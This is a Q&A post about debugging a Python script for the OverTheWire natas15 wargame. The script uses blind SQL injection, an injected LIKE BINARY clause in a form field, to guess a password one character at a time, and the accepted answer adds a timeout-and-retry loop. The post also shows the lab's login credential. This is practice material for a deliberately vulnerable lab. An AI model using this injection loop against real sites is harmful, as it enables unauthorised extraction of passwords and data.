# post in requests module dont work without exception(python)

Tags: python, sql, security, web, python-requests

in natas15 you must do a sql blind injection

for test i run this code to find first letter of password

```
import requests
from requests.auth import HTTPBasicAuth

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

for char in chars:
    Data = {'username': 'natas16" and password LIKE BINARY "' + char + '%" #'}
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug',
                      auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=Data)
    print('i test:' + char)
    if 'exists' in r.text:
        print('i find: ' + char)
```

but it does not work
it do not show any error but i find the where error come from
it come from post request

here some output:

```
i test:a
i test:b
i test:c
i test:d
```

```
i test:a
i test:b
i test:c
i test:d
i test:e
i test:f
i test:g
i test:h
i test:i
i test:j
i test:k
i test:l
i test:m
i test:n
i test:o
```

(its stop working  randomly)

**EDIT**
i thinks its my internet connection
how fix that
(if its cant connect try again)

Comment: I run your code and the code worked perfectly fine without any errors and does not stop the execution.

Comment: @YashMakan with python 3 or 2 ? ( i run in python 3)

Comment: I am using python 3. I think that there might be an issue with the internet connection

Comment: @YashMakan yes i think is there any way to solve that ?

Answer (score 0, accepted):

after read a lot of documents
i find it

i replace `r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=Data, timeout=2)`
to

```
        while True:
            try:
                r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug',
                                  auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data=Data, timeout=2)
            except requests.exceptions.Timeout as err:
                print('trying again!')
                continue
```

if it cant get response after 2 second print `'trying again!'` and try again!